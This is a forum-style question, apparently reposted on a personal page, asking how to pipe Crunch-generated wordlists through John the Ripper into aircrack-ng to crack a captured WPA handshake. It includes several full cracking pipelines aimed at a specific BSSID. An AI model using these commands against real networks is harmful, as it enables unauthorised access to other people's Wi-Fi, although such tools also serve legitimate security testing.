• caglararli@hotmail.com
  • 05386281520

WPA cracking with Crunch, JTR & Aircrack

Çağlar Arlı      -    1 Views

WPA cracking with Crunch, JTR & Aircrack

Now I assume that everyone knows of aircrack-ng and John The Ripper with it's fantastic ability to pause and resume cracking.

With that aside, I want to add Crunch into the mix, however I can't seem to add crunch to it. The plan as goes:

Crunch > John OR Aircrack [ If > John, then Crunch > John > Aircrack ]

John > Aircrack [ So Crunch > Aircrack & John > Aircrack ]

I am running this on the MacOSX Terminal, but I guess this doesn't matter because all three have installed successfully, however I have to cd ~/jtr/run/ in order to use john the ripper.

Any idea on how to mix them together, anyone? If you want, I'm using crunch 8 20 charset.lst -f mixalpha-numeric-all-space

So far I have tried

./john -wordlist= -session=stpcrunch -stdout |crunch 8 20 -f ~/crunch-3.6/charset.lst mixalpha-numeric-symbol14-space -i | aircrack-ng -a 2 -b D0:57:4C:56:D2:30 -w - ~/-01.cap

crunch 8 20 -f ~/crunch-3.6/charset.lst mixalpha-numeric-symbol14-space -i |./john -wordlist= -session=stpcrunch -stdout | aircrack-ng -a 2 -b D0:57:4C:56:D2:30 -w - ~/-01.cap

./john -session=stpcrunch -stdout | crunch 8 20 mixalpha-numeric-all-space | aircrack-ng -a 2 -b D0:57:4C:56:D2:30 -w - ~/-01.cap

However all of these had crunch and aircrack working, however john doesn't work... I need all of them to work. - Although doing Ctrl+c stops crunch, but when ctrl+c is pressed again, it can't stop aircrack...?